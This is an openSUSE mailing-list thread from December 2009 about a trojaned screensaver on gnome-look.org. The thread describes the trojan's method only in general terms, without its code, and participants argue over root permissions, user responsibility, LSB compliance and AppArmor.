[opensuse] Carelessness busts Linux security
I originally posted this in offtopic but think that this would be of interest to more people than just those frequenting offtopic. *No operating system can ever properly protect a computer from trojans as long as users continue to do silly things. Just because Linux is immune to your standard drive-by viruses it does not mean that it can escape trojan horses.* The latest reminder to be vigilant comes via the users unfortunate enough <http://ubuntuforums.org/showthread.php?t=1349678> to download and install a malicious screensaver from gnome-look.org <http://www.gnome-look.org/content/show.php/WaterFall+Screensaver?content=116772>. Although the malicious content is now removed, the code fragments left show what the trojan's potential may have been. The program inserted a bash script into |/usr/bin/| by using |wget| and then executing the script. Originally the script's contents were a ping command but this was later changed to: .................. http://www.zdnet.com.au/blogs/null-pointer/soa/Carelessness-busts-Linux-secu... BC -- The best defence against logic is ignorance. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On Thu, 2009-12-10 at 12:29 +1100, Basil Chupin wrote:
I originally posted this in offtopic but think that this would be of interest to more people than just those frequenting offtopic. *No operating system can ever properly protect a computer from trojans as long as users continue to do silly things. Just because Linux is immune to your standard drive-by viruses it does not mean that it can escape trojan horses.* The latest reminder to be vigilant comes via the users unfortunate enough <http://ubuntuforums.org/showthread.php?t=1349678> to download and install a malicious screensaver from gnome-look.org <http://www.gnome-look.org/content/show.php/WaterFall+Screensaver?content=116772>. Although the malicious content is now removed, the code fragments left show what the trojan's potential may have been. The program inserted a bash script into |/usr/bin/| by using |wget| and then executing the script. Originally the script's contents were a ping command but this was later changed to:
Nope, only superuser can create a file in /usr/bin; so this has no impact on "careless users", only careless admins. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On Thu, 10 Dec 2009 12:29:59 +1100, you wrote:
The program inserted a bash script into |/usr/bin/| by using |wget| and then executing the script.
This can only happen to a user that has superuser (i.e. 'root') rights. Normal users can't write in /usr/bin. openSUSE warns you prominently when you start an X session as root. If you ignore that, you have nobody to blame then yourself. Philipp -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 12/10/2009 05:39 AM, Philipp Thomas wrote:
This can only happen to a user that has superuser (i.e. 'root') rights. Normal users can't write in /usr/bin. openSUSE warns you prominently when you start an X session as root. If you ignore that, you have nobody to blame then yourself.
It /did/ warn. It doesn't warn. I tried. - -- Cheers / Saludos, Carlos E. R. (from 11.2 "Emerald" GM (bombadillo)) -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.12 (GNU/Linux) Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/ iEYEARECAAYFAksgw9sACgkQU92UU+smfQXgkQCePUkImHhFFGu8JmJZ9zKmDuzH zZEAn2KWShOcJrPlBHjVLDhukdDVba49 =EQo7 -----END PGP SIGNATURE----- -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On Thursday 10 Dec 2009 01:29:59 Basil Chupin wrote:
I originally posted this in offtopic but think that this would be of interest to more people than just those frequenting offtopic.
*No operating system can ever properly protect a computer from trojans as long as users continue to do silly things. Just because Linux is immune to your standard drive-by viruses it does not mean that it can escape trojan horses.*
The latest reminder to be vigilant comes via the users unfortunate enough <http://ubuntuforums.org/showthread.php?t=1349678> to download and install a malicious screensaver from gnome-look.org <http://www.gnome-look.org/content/show.php/WaterFall+Screensaver?content=1 16772>.
Although the malicious content is now removed, the code fragments left show what the trojan's potential may have been.
The program inserted a bash script into |/usr/bin/| by using |wget| and then executing the script. Originally the script's contents were a ping command but this was later changed to:
..................
http://www.zdnet.com.au/blogs/null-pointer/soa/Carelessness-busts-Linux-sec urity/0,2001102868,339299939,00.htm?feed=rss
BC
Lets hope there is someone on the KDE related download sites checking for people trying to insert malware into their programs. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On 10/12/09 18:12, ianseeks wrote:
On Thursday 10 Dec 2009 01:29:59 Basil Chupin wrote:
I originally posted this in offtopic but think that this would be of interest to more people than just those frequenting offtopic.
*No operating system can ever properly protect a computer from trojans as long as users continue to do silly things. Just because Linux is immune to your standard drive-by viruses it does not mean that it can escape trojan horses.*
The latest reminder to be vigilant comes via the users unfortunate enough <http://ubuntuforums.org/showthread.php?t=1349678> to download and install a malicious screensaver from gnome-look.org <http://www.gnome-look.org/content/show.php/WaterFall+Screensaver?content=1 16772>.
Although the malicious content is now removed, the code fragments left show what the trojan's potential may have been.
The program inserted a bash script into |/usr/bin/| by using |wget| and then executing the script. Originally the script's contents were a ping command but this was later changed to:
..................
http://www.zdnet.com.au/blogs/null-pointer/soa/Carelessness-busts-Linux-sec urity/0,2001102868,339299939,00.htm?feed=rss
BC
Lets hope there is someone on the KDE related download sites checking for people trying to insert malware into their programs.
It is rather disappointing that nobody from Novell/openSUSE has bothered to respond to this because I raised (again), indirectly, this question about the security of Linux in my repost (see, REPOST: Most interesting.... etc) a couple of days ago in this forum. As my REPOST message states, the question of security was not fully pursued - after it was claimed that permissions can be changed even within a user's environment. The question raised in the kubuntu forum also did not attract a response from those offering kubuntu to its audience. The security question there also remains unanswered - the same as here I have to say. I can understand why security issues, what they are and how they could be compromised, should not be publicly discussed but I cannot see why questions about security have to only be answered by ordinary users in this, or other similar fora, without somebody from the producers of the OS - in this case, openSUSE - cannot state what the "official" response is about how 'their' OS is not subject to being compromised. I think that you can get the gist of what I am talking about....(Which is something along-the-lines of getting a response from somebody who has a genuine and recognisable monicker directly linking her/him to Novell's ownership of openSUSE.) It really is like the argument going on the present time between those who claim that there is global warming and those who claim that there is no such thing. While the former keep quoting scientific papers which have been peer-reviewed, the latter can only quote blogs, lobbyists' ravings and newspaper articles. BC -- If you don't succeed you run the risk of failure. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
I can understand why security issues, what they are and how they could be compromised, should not be publicly discussed but I cannot see why questions about security have to only be answered by ordinary users in this, or other similar fora, without somebody from the producers of the OS - in this case, openSUSE - cannot state what the "official" response is about how 'their' OS is not subject to being compromised.
It is *not* 'their' OS, it is Open Source. And this issues does *not* represent a compromise; it represents stupidity and negligence on the part of the local administrator.
I think that you can get the gist of what I am talking about....(Which is something along-the-lines of getting a response from somebody who has a genuine and recognisable monicker directly linking her/him to Novell's ownership of openSUSE.)
I have *no* need of anyone from Novell to response about this - the answer is that basic UNIX security resolves this issue; and all distributions are impacted the exact same way.
It really is like the argument going on the present time between those who claim that there is global warming and those who claim that there is no such thing.
Go stuff it. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On 11/12/09 22:18, Adam Tauno Williams wrote:
I can understand why security issues, what they are and how they could be compromised, should not be publicly discussed but I cannot see why questions about security have to only be answered by ordinary users in this, or other similar fora, without somebody from the producers of the OS - in this case, openSUSE - cannot state what the "official" response is about how 'their' OS is not subject to being compromised.
It is *not* 'their' OS, it is Open Source.
In case you haven't heard, just in case in case, Novell/openSUSE people "massage" things to make some things 'unique' to oS. For example, is YasT available in other distros? And have you read some of the dox in oS which specifically state that openSUSE has "massaged" control files (but don't ask me right now for an example.) And have you heard that there is a movement to standardise the way distros are put together so that all/most control files/directory structures/apps can be interchangeable? Yes/No?
And this issues does *not* represent a compromise; it represents stupidity and negligence on the part of the local administrator.
See my response to Marcus. Who is oS aimed at: the "administrator" or the common punter, like me, in the street?
I think that you can get the gist of what I am talking about....(Which is something along-the-lines of getting a response from somebody who has a genuine and recognisable monicker directly linking her/him to Novell's ownership of openSUSE.)
I have *no* need
You selfish bugger! Always with the, "Me, me, me......" Well, *I* do have a need for such a response! Got a problem with this?
of anyone from Novell to response about this - the answer is that basic UNIX security resolves this issue; and all distributions are impacted the exact same way.
So? So why cannot someone - someone like you for example - answer this question? All you keep going on about is what you have been going on about. Why not at least have the capacity to answer like Marcus is answering with sensible responses based on knowledge.
It really is like the argument going on the present time between those who claim that there is global warming and those who claim that there is no such thing.
Go stuff it.
Where? BC -- If you don't succeed you run the risk of failure. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On Sun, 2009-12-13 at 15:16 +1100, Basil Chupin wrote:
On 11/12/09 22:18, Adam Tauno Williams wrote:
I can understand why security issues, what they are and how they could be compromised, should not be publicly discussed but I cannot see why questions about security have to only be answered by ordinary users in this, or other similar fora, without somebody from the producers of the OS - in this case, openSUSE - cannot state what the "official" response is about how 'their' OS is not subject to being compromised. It is *not* 'their' OS, it is Open Source. In case you haven't heard, just in case in case, Novell/openSUSE people "massage" things to make some things 'unique' to oS. For example, is YasT available in other distros?
HELLO - That is what distributions do! Is system-config-securitylevel-tui available on openSUSE? No, but it exists on every CentOS box. And, BTW, Yast is an Open Source project used on distirbutions other than SuSe - including Oracle's "unbreakable" distribution.
And have you read some of the dox in oS which specifically state that openSUSE has "massaged" control files (but don't ask me right now for an example.)
Duh. It is a distro.
And have you heard that there is a movement to standardise the way distros are put together so that all/most control files/directory structures/apps can be interchangeable? Yes/No?
Yes. I package software. I'm aware. openSUSE complies very well with the Linux filesystem standard. Go read the document and come back with cases where it doesn't. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On Sun, 13 Dec 2009 12:51:05 -0500, you wrote:
openSUSE complies very well with the Linux filesystem standard.
He's talking about LSB, not FHS. But again openSUSE was one of the first if not the first distribution to comply with LSB. Philipp -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On Sun, 13 Dec 2009 15:16:55 +1100, you wrote:
In case you haven't heard, just in case in case, Novell/openSUSE people "massage" things to make some things 'unique' to oS.
No, they're not!
For example, is YasT available in other distros?
That's not our fault! YaST is completely open source and other distributions are free to use it. BTW, there is *no standard install and configuration tool for Linux distributions.
And have you read some of the dox in oS which specifically state that openSUSE has "massaged" control files (but don't ask me right now for an example.)
Without proof I'll call this FUD.
And have you heard that there is a movement to standardise the way distros are put together so that all/most control files/directory structures/apps can be interchangeable? Yes/No?
That movement is called LSB and SUSE Linux was AFAIK the first distribution to comply with it. But you seem to lack the knowledge what LSB defines. I suggest reading up on it before talking about it.
Who is oS aimed at: the "administrator" or the common punter, like me, in the street?
In a Linux system, the common punter *has* to acquire some admin knowledge otherwise it's hopeless. Linux makes it harder to shoot your foot but not impossible. Philipp -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On 14/12/09 08:10, Philipp Thomas wrote:
In a Linux system, the common punter *has* to acquire some admin knowledge otherwise it's hopeless. Linux makes it harder to shoot your foot but not impossible.
So, the most common concept/impression about Linux that it is "for geeks" is correct, according to your understanding. Correct? Unless you first acquire some "admin knoweldge" you should not install a Linux distro - least of all openSUSE - but stick with whatever flavour of Microsoft Windows you are currently using. Is this correct, according to your words? Alright then....let's go on.... "Linux makes it harder to shoot your foot but not impossible." I've been asking - if you really bothered to understand what I have been writing - is, "What is being done to stop this possibility of shooting oneself in the foot" when all the normal blurb, bruhaha, BS, about Linux being so secure that one should move from MS to Linux if you want security? OK, fine, Linux is more secure than MS or Apple s/ware - but it is NOT as watertight as a fish's bum, right? So why not simply acknowdledge that Linux is not as tight as a fish's bum - and then go about trying to ensure that it IS watertight. I asked if AppArmor was the fledging beginning of such an aim. Are you in agreement or are you not? BC -- If you don't succeed you run the risk of failure. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On Mon, 14 Dec 2009 16:57:44 +1100, you wrote:
Unless you first acquire some "admin knoweldge" you should not install a Linux distro - least of all openSUSE - but stick with whatever flavour of Microsoft Windows you are currently using. Is this correct, according to your words?
No, you're putting words into my mouth I never said! Since when has failure of knowledge stopped anyone from installing Windows?
if you really bothered to understand what I have been writing
Thank you, but I have indeed understood what you've been writing. Don't imply misunderstanding when people don't say what you expect.
"What is being done to stop this possibility of shooting oneself in the foot"
You have to allow for that possibility as you would otherwise create a system nobody can work with and wants to work with.
when all the normal blurb, bruhaha, BS, about Linux being so secure that one should move from MS to Linux if you want security?
Linux *is* much more secure than Windows, period! Given that an application can't normally write anywhere outside your home directory there is for instance no way to infect binaries outside your home directory. There is *no* way to controll what an admin installs so if you trust unknown sources you're the only one to blame. This is a social problem that you can't solve with technical means or at least only to a certain degree.
but it is NOT as watertight as a fish's bum, right?
Nobody said that it is so.
and then go about trying to ensure that it IS watertight.
You can't make it watertight. You're dealing with living persons and as long as you let them have access to a system there's always possibilities for security breaches.
I asked if AppArmor was the fledging beginning of such an aim.
AA is more than a fledging beginning. If you want to see where stricter security leads look at the huge effort needed to get SELinux working the way you wnat it. And no, this is nothing a distributor can do for you. Philipp -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday, 2009-12-11 at 17:56 +1100, Basil Chupin wrote:
It is rather disappointing that nobody from Novell/openSUSE has bothered to respond to this because I raised (again), indirectly, this question about the security of Linux in my repost (see, REPOST: Most interesting.... etc) a couple of days ago in this forum.
There is a security list, if you really think this is a security issue. However, there is nothing in the world that can protect you from a trojan you install yourself. - -- Cheers, Carlos E. R. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.9 (GNU/Linux) iEYEARECAAYFAksjbeAACgkQtTMYHG2NR9WC/ACfW3wO0l/RIu6UTaCMNvi+ZYRf DNoAnjNrgD+UWuKlNMujOeDxsESjs8r7 =UV8t -----END PGP SIGNATURE----- -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On 12/12/09 21:18, Carlos E. R. wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Friday, 2009-12-11 at 17:56 +1100, Basil Chupin wrote:
It is rather disappointing that nobody from Novell/openSUSE has bothered to respond to this because I raised (again), indirectly, this question about the security of Linux in my repost (see, REPOST: Most interesting.... etc) a couple of days ago in this forum.
There is a security list, if you really think this is a security issue. However, there is nothing in the world that can protect you from a trojan you install yourself.
Thanks Carlos. I know about the security mail list. But this is not what I am talking about. I see no reason why I, or any, openSUSE user have to subscribe to a - any - security mail list to begin with. Also, the statement that "nothing in the world ..... can protect you from a trojan you install yourself" is just a bit of a rhetorical statement considering that when you - as a home user - run something like openSUSE *EVERY* file/application you install HAS to be installed by "YOU" as superuser. Try calling up YasT. You won't get in unless you type in the root password. So, this statement is just a furphy :-) . But if you are also implying that I should be pursuing this in the security mail list then my response is that why shouldn't it be discussed in a broad issue mail list such as this but instead be hidden within the bowels of a very specialised, and boring for almost everyone, mail list such as security? :-) BC -- If you don't succeed you run the risk of failure. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Sunday, 2009-12-13 at 15:34 +1100, Basil Chupin wrote:
On 12/12/09 21:18, Carlos E. R. wrote:
There is a security list, if you really think this is a security issue. However, there is nothing in the world that can protect you from a trojan you install yourself.
Thanks Carlos. I know about the security mail list.
But this is not what I am talking about. I see no reason why I, or any, openSUSE user have to subscribe to a - any - security mail list to begin with.
Also, the statement that "nothing in the world ..... can protect you from a trojan you install yourself" is just a bit of a rhetorical statement considering that when you - as a home user - run something like openSUSE *EVERY* file/application you install HAS to be installed by "YOU" as superuser. Try calling up YasT. You won't get in unless you type in the root password.
So, this statement is just a furphy :-) .
It is a fact. Nothing can protect you (fully, that is) from a trojan. It is impossible. Same as in real life... I don't know the English names of the scams you can be subject to. Some of them are age old, and still people fall for them. Like "tocomocho" in Spanish.
But if you are also implying that I should be pursuing this in the security mail list then my response is that why shouldn't it be discussed in a broad issue mail list such as this but instead be hidden within the bowels of a very specialised, and boring for almost everyone, mail list such as security? :-)
Because the people most experienced in security are there. If they are busy experts, they will not read this. Truly, not even writing there guarantees that they'll answer this :-p You can discuss it here, of course. But then don't complain you do not get "official" answers. Nor that I assure you that you will get them there. Maybe you wont. Maybe experts consider this a futile discussion and ignore this thread completely >:-) - -- Cheers, Carlos E. R. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.9 (GNU/Linux) iEYEARECAAYFAksk93QACgkQtTMYHG2NR9VYmQCfVCOlnbaPRIPABkSILB4j1Z6M V6wAoIQ1byDt6qrdY45CFYGWR1my+QZ7 =0AGX -----END PGP SIGNATURE----- -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On 14/12/09 01:17, Carlos E. R. wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Sunday, 2009-12-13 at 15:34 +1100, Basil Chupin wrote:
But if you are also implying that I should be pursuing this in the security mail list then my response is that why shouldn't it be discussed in a broad issue mail list such as this but instead be hidden within the bowels of a very specialised, and boring for almost everyone, mail list such as security? :-)
Because the people most experienced in security are there. If they are busy experts, they will not read this. Truly, not even writing there guarantees that they'll answer this :-p
You can discuss it here, of course. But then don't complain you do not get "official" answers.
Nor that I assure you that you will get them there. Maybe you wont. Maybe experts consider this a futile discussion and ignore this thread completely >:-)
Ah, of course, the "experts"....the "experts". Such wonderful peoples! So knowledgeabubblebubble! I don't have enough 'ammunition' left to keep weeing against the "experts", sorry, "the wind" so I shall now go away and recharge my reserves.... :-) . BC -- If you don't succeed you run the risk of failure. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
I changed subject to more appropriate one. Social engineering has nothing to do with particular operating system. On Wikipedia in article about computer security you can find examples where the best software and security design was busted because of user(s). http://en.wikipedia.org/wiki/Computer_security On Friday 11 December 2009 00:56:14 Basil Chupin wrote:
As my REPOST message states, the question of security was not fully pursued - after it was claimed that permissions can be changed even within a user's environment.
It is not "even can be", it is designed to be possible. It is UNIX heritage where few thousands users didn't call system administrator to set permissions in their home directory. They did that according to their needs. And there is nothing to pursue if user can't get basic advice: *Do* *not* *download* *files* *from* *unknown* *sources*. Web page where majority of posts come from benevolent Linux contributors, but has no strict control over user identity, is not automatically place where you can trust every file posted. -- Regards Rajko, openSUSE Wiki Team: http://en.opensuse.org/Wiki_Team People of openSUSE: http://en.opensuse.org/People_of_openSUSE/About -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
participants (6)
-
Adam Tauno Williams
-
Basil Chupin
-
Carlos E. R.
-
ianseeks
-
Philipp Thomas
-
Rajko M.